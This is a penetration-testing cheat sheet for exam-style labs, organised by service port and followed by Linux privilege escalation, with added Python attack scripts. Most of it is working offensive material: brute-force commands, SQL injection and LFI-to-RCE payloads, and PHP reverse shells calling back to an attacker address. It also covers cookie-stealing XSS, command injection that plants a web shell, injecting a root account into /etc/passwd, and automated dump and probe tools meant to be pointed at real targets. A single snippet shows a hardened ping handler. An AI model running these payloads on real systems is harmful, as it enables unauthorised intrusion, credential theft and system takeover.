- PORT 21 (FTP)
- -Check for anonymous login (anonymous:anonymous)
- -Check for directory traversal (ls ../../../) to enumerate files outside the FTP root.
- -Look for password files that could be reused against SSH or a web server.
- -Check the FTP server version for buffer overflows or other public exploits.
- -Check for writable directories, especially web roots.
- EXAMPLE: (cd wwwroot; put shell.asp)
- PORT 22 (SSH)
- -Banner grab the version (nc ipaddress 22)
- -Google the SSH version for exploits etc.
- -Predictable PRNG? (sufferance)
- -Once a username is discovered TRY A BRUTEFORCE
- EXAMPLE: (hydra -l patrick -P /usr/share/wordlists/rockyou.txt 10.11.1.24 ssh)
- -SSH can be used to port forward any service that only accepts local connections
- EXAMPLE: (ssh -L 127.0.0.1:80:intra.example.com:80 gw.example.com)
- PORT 23 (TELNET)
- -Bruteforce (hydra -l root -P /usr/share/wordlists/rockyou.txt 10.11.1.12 telnet)
- -Banner grab version and look for exploits (nc 10.11.1.12 23)
- PORT 25 (SMTP)
- -VRFY users manually or with a script; greet the server with EHLO first if it requires it.
- -Bear in mind POP3 on the same host could also be open to login/access with the same credentials.
- -Check the version as always, banner grab with telnet
- PORT 80 (HTTP)
- -Nikto to check for low hanging fruit (nikto -h http://10.11.1.12)
- -Google all versions returned by Nikto; watch for Shellshock, .action pages (Apache Struts), robots.txt; manually poke around; check the source code
- -Gobuster (/usr/bin/gobuster -w /usr/share/wordlists/dirb/big.txt -u http://10.11.0.42). Add -x to search for extensions (e.g. -x php,txt). Newer gobuster versions need the dir subcommand: gobuster dir -u http://10.11.0.42 -w /usr/share/wordlists/dirb/big.txt
- -Login Form = SQLI or Default Credentials, or rabbithole. Those are the main options.
- -Try admin:admin, admin:password etc.
- -Try to understand the web server: what is its purpose? What features are available? If something stands out, it could be the way in...
- -SQLI >> ' or 1=1-- >> admin'-- >> ' or '1'='1#
- -Error based SQLI: identify the query string parameter or a DB error (http://meme.com?id=1)
- -Enumerate columns (http://meme.com?id=1 order by 1), increasing the number until you get an unknown column error; the last number that worked is the column count.
- -Determine the best column to use to display output (http://meme.com?id=1 union all select 1,2,3,4,5)
- -If you see a marker number on the screen, that column can be used for output.
- -Find tables in the database (http://meme.com?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables)
- -Display the columns of the tables found (http://meme.com?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns WHERE table_name='users')
- -Display column contents, use concat for multiple columns
- (http://meme.com?id=1 union all select 1,2,3,concat(usernames,0x3a,passwords),5 FROM users)
- -Side note: sometimes sleep() (time-based blind injection) comes in handy if no output is being displayed, see the Hackademic_RTB1 box.
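The ORDER BY / UNION procedure above, automated end to end. This is an added example, not code from the original notes: it runs offline against a constructed in-memory SQLite database, with page() standing in for a PHP page that concatenates ?id= into its query. SQLite has no information_schema, so sqlite_master is queried instead; the table/column names and the rendered HTML are assumptions for the demo (for MySQL, swap in information_schema.tables/.columns and concat(a,0x3a,b) for the || operator).

```python
"""Union-based SQL injection walkthrough (ORDER BY -> UNION markers -> table/column dump).

Added example, not from the original notes. Everything below is constructed: the
in-memory SQLite database, the vulnerable page() and its HTML layout.
"""
import re
import sqlite3


def build_db():
    """Constructed sample database: a 5-column products table plus a users table to loot."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL, descr TEXT, stock INTEGER);
        INSERT INTO products VALUES (1, 'widget', 9.99, 'a widget', 5);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t'), (2, 'bob', 'hunter2');
    """)
    return con


def page(con, id_param):
    """VULNERABLE stand-in for meme.com?id=...: raw concatenation; renders only name and descr."""
    sql = "SELECT id, name, price, descr, stock FROM products WHERE id=" + id_param
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"          # error-based SQLi: the DB error reaches the page
    return "\n".join(f"<li>{r[1]} - {r[3]}</li>" for r in rows)


def find_column_count(con, max_cols=20):
    """Step 1: ORDER BY n until the DB complains; the last n that worked is the column count."""
    for n in range(1, max_cols + 1):
        if page(con, f"1 ORDER BY {n}").startswith("ERROR"):
            return n - 1
    return None


def find_reflected_columns(con, ncols):
    """Step 2: UNION SELECT 1,2,...,n with a non-matching id so only the marker row renders;
    the numbers that show up on the page are the columns usable for output."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    body = page(con, f"-1 UNION ALL SELECT {markers}")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", body)]


def dump_column(con, ncols, col, expr, table, where=""):
    """Step 3: put expr into reflected column `col`, NULL elsewhere, and scrape the results.
    The scraper assumes `col` is the one rendered before ' - ' (column 2 in this page)."""
    slots = ["NULL"] * ncols
    slots[col - 1] = expr
    body = page(con, f"-1 UNION ALL SELECT {','.join(slots)} FROM {table}{where}")
    return re.findall(r"<li>(.*?) - ", body)


def loot(con):
    """Full chain: column count -> first reflected column -> table names -> users dump."""
    ncols = find_column_count(con)
    col = find_reflected_columns(con, ncols)[0]
    tables = dump_column(con, ncols, col, "name", "sqlite_master", " WHERE type='table'")
    creds = dump_column(con, ncols, col, "username || ':' || password", "users")
    return ncols, col, tables, creds


if __name__ == "__main__":
    print(loot(build_db()))
```

The id value -1 matches no real row, so only the UNION row is rendered; that is why the markers are visible. On a real target replace page() with an HTTP request and keep the three attack functions as they are.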
- -Check Nikto see if PUT is enabled, if so use nmap scripts to upload a shell. (nmap -p 80 <ip> --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php')
- -Also viable are .asp shells or .ps1 for powershell.
- -PHP Payloads
- 1) <?php echo shell_exec("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1");?>
- 2) <?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f");?>
- 3) <?php echo shell_exec($_GET['e']);?>
- 4) php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
- 5) pentest monkey PHP reverse shell, available here http://pentestmonkey.net/tools/web-shells/php-reverse-shell
- -ASP Shell Generation (msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.42 LPORT=4444 -f asp > shell.asp)
- -LFI (Local File Inclusion)
- -Basic test for Apache on Linux is three directories up: ../../../etc/passwd
- -Check query strings like ?page=, ?file=
- -Older PHP versions (before 5.3.4) allow truncating with a null byte, ../../../etc/passwd%00, if the server appends an extension to the file name
- -FILES TO INCLUDE
- 1) /etc/passwd
- 2) /etc/shadow ?
- 3) /root/.ssh/id_rsa
- 4) index.php
- 5) Any other files discovered (i see you poison from htb)
- -LFI to RCE
- -try to include /proc/self/environ
- -if this file can be included, put one of the PHP shells in the User-Agent header. When the file is included the PHP will be interpreted and run.
- -try to include /proc/self/fd
- -if this can be included, find the main log file by including /proc/self/fd/1 all the way through /proc/self/fd/23
- -then change the Referer header to PHP and revisit the file to run the code.
- -try to include the web server access log (/var/apache/logs/access.log; also common: /var/log/apache2/access.log, /var/log/httpd/access_log)
- -if this can be included, get RCE by writing PHP into the log via the User-Agent and including it.
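The LFI probing and /proc/self/environ poisoning steps above, written as client-side tooling. This is an added example, not code from the original notes. The fetch(url, headers) callable is injected so the same logic runs against a real target (http_fetch) or against the constructed fake_server() below, which mimics a PHP page doing include($_GET['page'] . '.php'); MARKER, PHP_PROBE, the URL and the parameter name are assumptions for the demo.

```python
"""LFI probing and /proc/self/environ poisoning, written as client-side tooling.

Added example, not from the original notes. The fake server is a constructed test
double; point find_lfi()/environ_rce() at http_fetch for a real lab target.
"""
import urllib.request

MARKER = "LFI_RCE_OK_7f3a"                  # assumed marker string
PHP_PROBE = f"<?php echo '{MARKER}'; ?>"    # harmless probe; swap in a real PHP shell once it works


def lfi_payloads(target="/etc/passwd", max_depth=8):
    """Traversal candidates, each with and without %00 (the null byte only truncates on PHP < 5.3.4)."""
    out = []
    for depth in range(1, max_depth + 1):
        base = "../" * depth + target.lstrip("/")
        out += [base, base + "%00"]
    return out


def find_lfi(fetch, base_url, param, max_depth=8):
    """Return the first payload whose response contains a passwd root line, else None."""
    for payload in lfi_payloads("/etc/passwd", max_depth):
        body = fetch(f"{base_url}?{param}={payload}", {})
        if "root:x:0:0" in body or "root:*:0:0" in body:
            return payload
    return None


def environ_rce(fetch, base_url, param, working_payload):
    """Reuse the working traversal prefix to include /proc/self/environ with PHP in the
    User-Agent; True if the page executed the probe (marker appears instead of the raw tag)."""
    prefix = working_payload.split("etc/passwd")[0]
    suffix = "%00" if working_payload.endswith("%00") else ""
    url = f"{base_url}?{param}={prefix}proc/self/environ{suffix}"
    return MARKER in fetch(url, {"User-Agent": PHP_PROBE})


def http_fetch(url, headers):
    """Real transport for use against a lab target."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def fake_server(webroot_depth=3, null_byte_works=True):
    """Constructed test double: webroot three directories below /, appends '.php' unless a
    null byte cuts the path (old PHP), and 'executes' PHP found in /proc/self/environ."""
    files = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"}

    def fetch(url, headers):
        value = url.split("=", 1)[1]
        if value.endswith("%00") and null_byte_works:
            value = value[:-3]                       # extension never gets appended
        else:
            value = value.replace("%00", "") + ".php"
        if value.count("../") < webroot_depth:
            return "Warning: include(): failed to open stream"   # still inside the webroot
        path = "/" + value.replace("../", "")
        if path == "/proc/self/environ":
            ua = headers.get("User-Agent", "")
            return "HTTP_USER_AGENT=" + ua.replace(PHP_PROBE, MARKER) + "\x00"
        return files.get(path, "Warning: include(): failed to open stream")
    return fetch


if __name__ == "__main__":
    srv = fake_server()
    hit = find_lfi(srv, "http://10.11.1.12/index.php", "page")
    print("LFI payload:", hit)
    print("environ RCE:", environ_rce(srv, "http://10.11.1.12/index.php", "page", hit))
```

Against a server that strips the null byte (patched PHP), the scan returns None, which is the signal to look for an include that does not append an extension, or to move on to log poisoning.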
- -RFI (Remote File Inclusion)
- -Check ALL LFI QUERY STRINGS!
- -listen on the standard HTTP port with netcat as a check (nc -lnvp 80) then request ?page=http://10.11.0.42
- -check whether a GET request reaches the handler.
- -Use a PHP payload to gain a shell; remember a null byte may be needed to truncate the appended extension on lower PHP versions
- -If root command execution is available by any other means, use it to set the root SUID bit on a shell binary the PHP shell can call, so the web shell can escalate.
- -XSS (Cross Site Scripting)
- -Easy enough: first try script tags, then an iframe... maybe some shenanigans like <scr<script>ipt> or other encodings
- -Hijack the admin's cookie by making the payload request a netcat port 80 handler with document.cookie appended (http://10.11.0.41/meme.php + document.cookie)
- -Does this even apply to the exam??
- -Can maybe use stored XSS to make GET API requests to do some fun stuff (might be out of scope entirely)
- -Command Injection
- -Pretty simple: the web server calls the operating system to perform tasks without sanitizing the arguments.
- -ping.php: input something with a separator (127.0.0.1; ls)
- -From there use a wget payload to upload a shell; note wget needs -O (capital) to write the file, lowercase -o only sets the log file (127.0.0.1; wget http://10.11.0.42/shell.php -O /var/www/html/shell.php)
- -Blind and File-based out of scope NO COMMIX ALLOWED
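The ping.php pattern beside a hardened version, as an added example that is not code from the original notes. ping_cmd_vulnerable() reproduces the bug (user input spliced into a shell string); the hardened path validates the value as a literal IP address or hostname and passes it as one argv element, never through a shell. The function names and sample inputs are assumptions for the demo.

```python
"""Command injection: the ping.php pattern beside a hardened version.

Added example, not from the original notes. Names and sample inputs are assumptions.
"""
import ipaddress
import re
import shlex
import subprocess

SHELL_METACHARS = [";", "|", "&", "\n", "`", "$(", ">", "<"]
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_cmd_vulnerable(host):
    """VULNERABLE: the string shell_exec("ping -c 1 " . $_GET['host']) would hand to /bin/sh."""
    return "ping -c 1 " + host


def injection_points(value):
    """Which separators an attacker could use against ping_cmd_vulnerable()."""
    return [m for m in SHELL_METACHARS if m in value]


def validate_host(value):
    """Allow-list: a literal IPv4/IPv6 address or an RFC 1123 hostname; anything else is rejected."""
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if len(value) <= 253 and HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"refusing host value: {value!r}")


def ping_argv_safe(host):
    """Hardened: argv list with shell=False, so ';', '|', '$(...)' are just bytes in one argument."""
    return ["ping", "-c", "1", validate_host(host)]


def ping_cmd_quoted(host):
    """If a shell string is unavoidable, shlex.quote() after validation is the fallback."""
    return "ping -c 1 " + shlex.quote(validate_host(host))


def run_ping(host):
    """Runs the hardened form; never shell=True."""
    return subprocess.run(ping_argv_safe(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    evil = "127.0.0.1; wget http://10.11.0.42/shell.php -O /var/www/html/shell.php"
    print(ping_cmd_vulnerable(evil))        # the whole line reaches /bin/sh
    print(injection_points(evil))
    try:
        ping_argv_safe(evil)
    except ValueError as err:
        print("blocked:", err)
    print(ping_argv_safe("10.11.1.12"))
```

Validation first, quoting second: shlex.quote alone would still let a hostname-shaped value through to the shell, so the allow-list is the real control and quoting only covers the case where shell=True cannot be removed.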
- -Weak Authentication
- -Pretty straightforward: admin:admin, admin:password, administrator:administrator etc.
- -Apache Tomcat: tomcat:tomcat, tomcat:password
- -GOOGLE ALL DEFAULT PASSWORDS
- -In general, use your brain and google all versions; remember a lot is out of scope for OSCP... no XXE or pickle deserialization lol
- PORT 445 (SMB)
- -Note this is one case where Sparta can save a lot of time...
- -run nmap nse scripts on the target (nmap --script=vuln 10.11.0.41)
- -Find smb users (nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254)
- -Try to find open smb shares (nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24)
- -access the share (smbclient "\\\\ip\\Bob Share\\rootfs") sufference lol
- -Try to read SSH keys, or other files, maybe /etc/shadow?
- -Use any exploits that provide RCE, e.g. manual EternalBlue https://github.com/3ndG4me/AutoBlue-MS17-010 etc.
- -remember a filtered port 445 or 139 found during privesc can be port forwarded so SMB exploits can reach it!!
- -impacket's smbclient.py is very useful!
- PRIVESC LINUX
- -check current user (whoami)
- -check kernel version (uname -a) google for exploits, check exploitdb
- -upload linuxprivchecker.py: serve it from the attacking box (python -m SimpleHTTPServer 80) and fetch it on the target (wget http://10.11.0.42/linuxprivchecker.py)
- -in general, use your brain.
- -SSH tunnel filtered services.
- -check for writable files; remember privesc via Python scripts run as root: import searches the script's own directory first (and the current directory for interactive or -c use), so a writable module path next to a root-run script is a hijack.
- -check sudo privileges (sudo -l); use those to overwrite files, or to run other commands as root
- -check for all files with "pass" in them.
- -is /etc/passwd writable? if so append a uid 0 user rather than overwriting the file (echo 'pwned::0:0:root:/root:/bin/bash' >> /etc/passwd) then (su pwned). An empty password field only works where PAM allows empty passwords; otherwise insert a hash from (openssl passwd -6).
- -if /etc/shadow is readable, try to crack the hashes: unshadow with /etc/passwd first (unshadow passwd.txt shadow.txt > passwords.txt) then (john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt)
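The privesc checks above (SUID binaries, writable sensitive files, files mentioning passwords, sudo -l, the /etc/passwd line to append), as an added example script that is not from the original notes and is not linuxprivchecker.py. It needs only the Python 3 already on the target; build_demo_tree() creates constructed sample files so the checks can be exercised offline, and the user name and shell in passwd_entry() are assumptions.

```python
"""Linux privesc quick checks, as a script you can drop on the box.

Added example, not from the original notes. The demo tree, user name and shell are
constructed/assumed; the checks themselves run against the real filesystem when
given real paths.
"""
import os
import re
import stat
import subprocess
import tempfile

SUID_ROOTS = ("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin", "/usr/local/sbin")
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/crontab")
PASS_RE = re.compile(rb"pass(word|wd)?\s*[:=]", re.IGNORECASE)


def suid_binaries(roots=SUID_ROOTS):
    """Regular files with the SUID or SGID bit set: (path, owner uid, mode)."""
    found = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    found.append((path, st.st_uid, oct(st.st_mode & 0o7777)))
    return found


def writable_sensitive(paths=SENSITIVE):
    """Sensitive files the current user can write (a writable /etc/passwd is an instant root)."""
    return [p for p in paths if os.path.exists(p) and os.access(p, os.W_OK)]


def files_mentioning_pass(root, max_size=1_000_000):
    """Files under root containing something like 'password=' or 'pass:' (skips big/unreadable)."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            if PASS_RE.search(data):
                hits.append(path)
    return sorted(hits)


def sudo_rules():
    """Output of sudo -n -l (non-interactive); None if sudo is missing or wants a password."""
    try:
        res = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return res.stdout if res.returncode == 0 else None


def passwd_entry(user="pwned", pw_hash=""):
    """Line to APPEND to a writable /etc/passwd: uid/gid 0, keeping the real root line intact.
    An empty hash field means no password, which only works where PAM permits empty
    passwords; otherwise paste a hash from `openssl passwd -6`. Then: su <user>."""
    return f"{user}:{pw_hash}:0:0:root:/root:/bin/bash"


def build_demo_tree():
    """Constructed sample tree so the checks above can run without a real target."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    os.makedirs(os.path.join(root, "bin"))
    with open(os.path.join(root, "config.php"), "w") as fh:
        fh.write('<?php $db_user = "app"; $db_pass = "s3cr3t"; ?>\n')
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("nothing interesting here\n")
    fake = os.path.join(root, "bin", "fakeroot")
    with open(fake, "w") as fh:
        fh.write("#!/bin/sh\nid\n")
    os.chmod(fake, 0o4755)       # SUID bit on our own file, to exercise suid_binaries()
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    print("uid:", os.getuid(), "kernel:", os.uname().release)
    print("suid (demo tree):", suid_binaries([demo]))
    print("writable sensitive:", writable_sensitive())
    print("pass files (demo tree):", files_mentioning_pass(demo))
    print("sudo -l:", sudo_rules())
    print("passwd line:", passwd_entry())
```

On a real box call suid_binaries() with the default roots and files_mentioning_pass("/var/www") or similar; sudo -n never prompts, so the script cannot hang waiting for a password.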